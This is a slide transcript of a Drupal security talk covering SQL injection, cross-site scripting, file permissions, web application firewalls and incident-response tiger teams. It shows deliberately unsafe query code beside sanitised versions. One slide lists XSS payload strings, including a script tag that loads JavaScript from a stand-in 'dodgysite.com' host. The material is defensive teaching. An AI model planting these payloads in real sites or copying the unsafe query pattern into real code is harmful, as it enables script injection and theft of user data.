Locking down Drupal and managing security breaches

By Andy ThorntonMediacurrent Consultant

Twitter: @BohemianPixelAndy.Thornton@mediacurrent.com

Overview

Slides will be made available at the end of the presentation

• Common Security Issues• Drupal Best Practices• Testing Tools• Web Application Firewalls• Tiger Teams• Planning and Policies• Managing a security breach.• Resources• Questions

What is SQL InjectionIn it's simplest form ..

Example SQL Statement:statement = "SELECT * FROM users WHERE name = '" + userName + "';"

But what would happen if they added something else to their name, something we didn't plan for ..

even more simply ...

Handling SQL Injection

Drupal makes it easy.

• check_plain()• check_markup()• filter_xss()• filter_xss_admin()

Bad: $username=$node->field_uname[0][‘value’];

Good: $username=check_plain($node->field_uname[0][‘value’]);

Tip: Don't forget this with other forms of input, such as arguments passed in the URL.

Sanitise your inputs

SQL Injection

Drupal 6• db_query()• db_rewrite_sql()

Bad:$result = db_query("SELECT * from {users} WHERE name = $myvar");

Good:$result = db_query(“SELECT pass FROM {users} WHERE name = ‘%s’, $myvar);

Drupal 7 Example:$result = db_query(“SELECT nid, title FROM {node} WHERE type = :type”, array(‘:type’ => ‘page’,));

Writing secure queries based on inputs

What is Cross Site Scripting?

Cross-site scripting holes are vulnerabilities where a user can inject malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page-content, session cookies, and a variety of other information maintained by the browser on behalf of the user.

What just happened?

The script from the previous slide doesn't do anything in Chrome, but when I open the page in Firefox or IE ....

More Examples...

Don't try these out on your site.

• ¼script¾alert(¢XSS¢)¼/script¾

• <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></object>

• <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

• <SCRIPT a=">" SRC="http://www.dodgysite.com/xss.js"></SCRIPT>

• <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

•  <A HREF="javascript:document.location='/logout'">XSS</A>

Protection from XSS

Never allow "Full HTML" on your posting Input filter for general users.

filter_xss($string, $allowed_tags = array('a', 'em', 'strong', 'p'))

Wrap you content with • filter_xss()• check_plain()• check_markup()

Examples:<body class="<?php print check_plain($_GET['parameter']); ?>">

Rule of Thumb  Never trust user input.  You can take user input, check it against a reference list and use resulting output to print the actual data.

Permissions

chmod, changes permissions on a file depending on who the user is, which groups they are members of, or how the rest of the world can interact with it.

Supports +/- , so

chmod o-w myfile

This example removes the ability for the world to edit the file making it read only.

chown, changes ownership of the file or directory. For drupal we would give the world (Apache) read only access to our settings.php, but let the user own the rest of the directory

chmod 400 settings.phpchown www-data:www-data settings.php

Social Engineering

Meet Kevin MitnickMaster of Social Engineering.http://mitnicksecurity.com/

It seems to be a universal truth that most people don't believe Social Engineering (gaining information by deceit) could be so easy. "No one could be that stupid" is a common phrase heard from people who first learn how these types of attacks work. 

However, once demonstrated (especially with some personal information of theirs) they become hard and fast believers. Just seeing it in action brings home the reality that information can leak through most any worker and that one must always be on guard. 

Couple of one-liners ...

Nosuid / NoexecSet up /site/default/files and /tmp on their own partitions./dev/sda3 /home/andy/public_html/sites/default/files ext3 defaults,nosuid

Set wgetrc to not save downloads.delete_after = on

Regular Security Scans against code.Use a tool like openvas / RATS or a web application firewall such as WhiteHat sentinal.

Limit who has access to your code base and server.Don't let vendors have more access than they need

Code for what you expect.Stop playing whack-a-mole and take ownership of your code. 

Web Application Firewalls

Handy Tools to know

Opensource Tools• Openvas• R.A.T.S.• Tripwire• NAXSI

Commercial• Web Inspect (HP)• Whitehat (WAF)• Barracuda (WAF)• Imperva (WAF)

Command Line Warriors• lsof• grep• find

Web Application Firewalls• NAXSI  • Armorlogic• Array Networks • Barracuda Web Application Firewall• Cisco• Citrix NetScaler• F5 Networks• Fortinet• ModSecurity• Radware• SonicWALL• Imperva• WhiteHat Security

Tiger Teams

“It is better to BE ready, than to GET ready.”

What is a tiger team?

Who's on it and why?

• IT Department.• Website Technical Lead (or project manager)• Management stakeholders.• Marketing & Corporate Communications team• Legal Department.

Trivia note: Microsoft refers to a Tiger Team as "Core Computer Security Incident Response Team" or CCSIRT for short. They have a good article on Technet on roles in a Tiger...<oops> CCSIRT team.http://technet.microsoft.com/en-us/library/cc700825.aspx

The term originated in aerospace design but is also used in other settings, including information technology and emergency management. According to a 1964 definition, 

"It has been described as a team of undomesticated and uninhibited technical specialists, selected for their experience, energy, and imagination, and assigned to track down relentlessly every possible source of failure in a spacecraft subsystem."

- wikipedia

What do they do?

Have access to contact points for out of hours members of the team / stakeholders & third parties. Setup an email for the team. (eg: tiger@mycompany.com) Access to communications plan and any associated documents.Secure area of network for collating evidence and documentation.Identify a chain of command, escalating communication down the chain.Schedule daily response meetings during the investigation.Establish a communication plan for the team to keep all stake holders informed. Flag emails with an incident response code, so they can be collated by legal or include tiger email.Setup communication plan for employees so they know how to respond if contacted by the press.Manage disclosure between employees and the public.Team members will keep their own departments apprised of the status of the investigation.Appoint a team leader, dedicated to the task they are prime contact for the management team.

Always have a plan

• Corporate Communication Plan.• Incident Response Worksheet.• Prepared Press release.• Internal Communication Policy. (loose lips, sink ships)• Communication list of internal stakeholders.• Appoint a single point of contact for inquiries.• Collect contact numbers for everyone involved and all third party resources.• Have a secure place put set aside on your network / Intranet.

"I have a plan so cunning you could stick a tail on it and call it a weasel"- Lord Edmund Blackadder

Always remember ...Sanitise your in/output.Use Drupal methods,Keep your site up to date.Have a plan in place.Audit your code.Never, never hack core.

Or Dries will send out creatures from Acquia's secret lab specifically trained to hunt Kittens ...

Handling a security breach

First Off

Unleash the Tigers

Activate your CSIRT .. Tiger Team!

• Start the clock.• Pull the plug, don't shut it down.• Redirect to a static page from a DNS level.• If possible, take a copy of the disk and store it offline.• Get the authorities involved the moment you have verified data has been

compromised.• Don't use a backup without knowing the cause of the attack.• Don't change passwords or try and fix files.• If the filesystem was compromised, don't trust that server build.• Investigate in parallel to the authorities.

Follow your workflow and communication plan.

ResourcesSecurity Team: http://drupal.org/node/32750 

Security advisories: http://drupal.org/security

Secure Text Handling:http://drupal.org/node/28984

Writing Secure Code:http://drupal.org/writing-secure-code

Responding to IT Security Incidentshttp://technet.microsoft.com/en-us/library/cc700825.aspx

Slideshttp://bit.ly/dca-security  

Secret ServiceAtlanta Electronic Crimes Task Force404-331-6111Email: atlantaectf@usss.dhs.gov

Questions?